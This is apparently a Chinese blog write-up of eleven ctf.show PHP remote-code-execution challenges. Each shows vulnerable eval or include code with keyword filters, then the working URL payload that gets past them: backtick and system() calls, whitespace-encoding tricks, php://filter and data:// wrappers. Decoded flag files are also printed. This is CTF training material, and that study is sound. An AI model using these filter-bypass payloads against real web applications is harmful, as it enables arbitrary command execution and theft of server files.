CTF-Show-RCE系列
CTF-Show-RCE系列
Problem 1
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//过滤flag关键字
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
system函数绕过
直接访问:http://d3d5e86e-ce2d-4fa2-8c28-48a63fa55df0.challenge.ctf.show/?c=system(%22tac%20fl*.php%22);
得到flag
Problem 2
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//过滤flag、system、php关键字
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
反引号绕过
直接访问:
http://d92f60d2-3ceb-4102-a4c4-6488acae34da.challenge.ctf.show/?c=echo%20`tac%20fla*`;
获得flag
Problem 3
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//过滤flag、system、php、cat、sort、shell、. 、空格、单引号
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
反引号绕过(过滤了空格,可以使用回车绕过)
%0A => 回车
%09 => tab
注:引号内只可以使用%09绕过
直接访问:
http://c39ab4b2-d129-4164-9dca-ae13ca1554d1.challenge.ctf.show/?c=echo%0A`tac%09fla*`;
获得flag
Problem 4
前置知识
php://filter 伪协议用于读取文件。
当allow_url_include=on时,并且存在文件包含漏洞时,可以使用php://filter直接把文件显示出来
案例:
http://xxx.xxx.xxx/index.php?filename=php://filter/read=convert.base64-encode/resource=xxx.php
- php://filter 是一种访问本地文件的协议(读取)
- read=convert.base64-encode 表示读取的方式时base64编码
- resource=xxx.php 表示读取的文件
以上内容参考:https://blog.csdn.net/m0_56107268/article/details/127760614
思路
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//在上一题的基础上过滤了反引号、echo关键字、分号、圆括号
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
文件包含绕过(php伪协议、参数逃逸),三种方式:
- 不加空格
- 使用%0a绕过
- 使用双引号
直接访问:
不加空格:http://49c47d3f-3c71-4ec7-b2f5-51c855db29ea.challenge.ctf.show/?c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
使用%0a绕过:http://49c47d3f-3c71-4ec7-b2f5-51c855db29ea.challenge.ctf.show/?c=include%0a$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
使用双引号:http://49c47d3f-3c71-4ec7-b2f5-51c855db29ea.challenge.ctf.show/?c=include%22$_GET[1]%22?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
注:在php中?>可以充当分号(最后一行语句中)。
得到一串base64编码
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7YTAzM2RiMDQtZTA1ZS00OWEzLWE3ZTctMGMyNTY5MDg2NWNkfSI7DQo=
将其解码,得到flag
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{a033db04-e05e-49a3-a7e7-0c25690865cd}";
Problem 5
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//在上一题基础上过滤双引号
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
依旧利用文件包含+php伪协议+%0a/无空格绕过
直接访问:
%0a绕过:http://f324d434-426c-4db5-82e5-db0a511926e9.challenge.ctf.show/?c=include%0a$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
无空格绕过:http://f324d434-426c-4db5-82e5-db0a511926e9.challenge.ctf.show/?c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
得到一串base64编码
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ZjVjMTYyMTItM2Y3MS00YjdkLWFjYmQtMDc4M2MxMzQ5OWM2fSI7DQo
进行解码,得到flag
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{f5c16212-3f71-4b7d-acbd-0783c13499c6}";
Problem 6
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//在上一题的基础上过滤冒号
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
依旧利用文件包含+php伪协议+%0a/无空格绕过
直接访问:
%0a绕过:http://4f04f045-4d96-4b9b-8a5b-8ce68da98a1f.challenge.ctf.show/?c=include%0a$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
无空格绕过:http://4f04f045-4d96-4b9b-8a5b-8ce68da98a1f.challenge.ctf.show/?c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
得到一串base64编码
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7MDgyYzU4NjktMTdiZi00YzkyLThiYzYtNjQ4NDkzZjhhODczfSI7DQo
进行解码,得到flag
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{082c5869-17bf-4c92-8bc6-648493f8a873}";
Problem 7
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//在上一题的基础上,过滤:<、=
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
依旧利用文件包含+php伪协议+%0a/无空格绕过
直接访问:
%0a绕过:http://1e59005c-4eff-4c1c-b7df-7a79857e86be.challenge.ctf.show/?c=include%0a$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
无空格绕过:http://1e59005c-4eff-4c1c-b7df-7a79857e86be.challenge.ctf.show/?c=include$_GET[1]?%3E&1=php://filter/read=convert.base64-encode/resource=flag.php
得到一串base64编码
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ZWQxNDY2ZmQtOTZlOC00NmVjLThkMTMtMmI2M2E3N2Y0ZTY5fSI7
进行解码,得到flag
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 03:37:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{ed1466fd-96e8-46ec-8d13-2b63a77f4e69}";
Problem 8
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//在上一题的基础上,过滤了/、0-9
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
依旧利用文件包含+php伪协议+%0a/无空格绕过
直接访问:
%0a绕过:http://6f652007-ae21-43ae-b2ca-49a8794c436e.challenge.ctf.show/?c=include%0a$_GET[a]?%3E&a=php://filter/read=convert.base64-encode/resource=flag.php
无空格绕过:http://6f652007-ae21-43ae-b2ca-49a8794c436e.challenge.ctf.show/?c=include$_GET[a]?%3E&a=php://filter/read=convert.base64-encode/resource=flag.php
得到一串base64编码
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7ZmU1ZmJiYzctODFlYi00NzI5LWIzZDEtMWU5NjQ2NGUyOWIyfSI7
将其解码,得到flag
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 03:37:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$flag="ctfshow{fe5fbbc7-81eb-4729-b3d1-1e96464e29b2}";
Problem 9
前置知识
php中的data伪协议:
数据流封装器,以传递相应格式的数据。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php代码执行。
1、data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
2、data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
以上内容参考:
https://blog.csdn.net/cosmoslin/article/details/120695429
思路
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
使用data伪协议进行绕过。
data伪协议:
http://b83f8aad-8985-4977-bbc5-5c656a9f946f.challenge.ctf.show/?c=data://text/plain,%3C?php%20echo%20system(%22tac%20fla*%22)?%3E
Problem 10
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//在上一题的基础上禁用了php、file关键字
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
使用data伪协议+base64编码绕过、短标签绕过
注:短标签 相当于echo,因此短标签内部不能再写echo,否则失效。
直接访问:
data伪协议+短标签绕过:http://f35d4539-0ccf-4028-b0fc-db14222846b8.challenge.ctf.show/?c=data://text/plain,%3C?=system(%22tac%20fla*%22);?%3E
data伪协议+base64编码绕过:https://f35d4539-0ccf-4028-b0fc-db14222846b8.challenge.ctf.show/?c=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oInRhYyBmbGEqIik7Pz4=
得到flag
Problem 11
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
//过滤flag关键字
if(!preg_match("/flag/i", $c)){
//包含时,后缀名固定
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
使用data伪协议+注释进行绕过
直接访问:
http://f1af80cf-4905-4f8f-b97e-5378f99f0382.challenge.ctf.show/?c=data://text/plain,%3C?php%20echo%20system(%22tac%20fla*%22)?%3E//
注://代表注释,注释掉.php后缀
总结
RCE绕过的常见姿势
- system函数绕过
- 反引号绕过
- %0a(回车)、%09(tab)绕过
- 文件包含绕过=>参数逃逸
- 伪协议绕过
- php://filter
- data://text/plain
- data://text/plain;base64
- 伪协议+注释进行绕过
- 短标签绕过
- 日志绕过
- ...
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!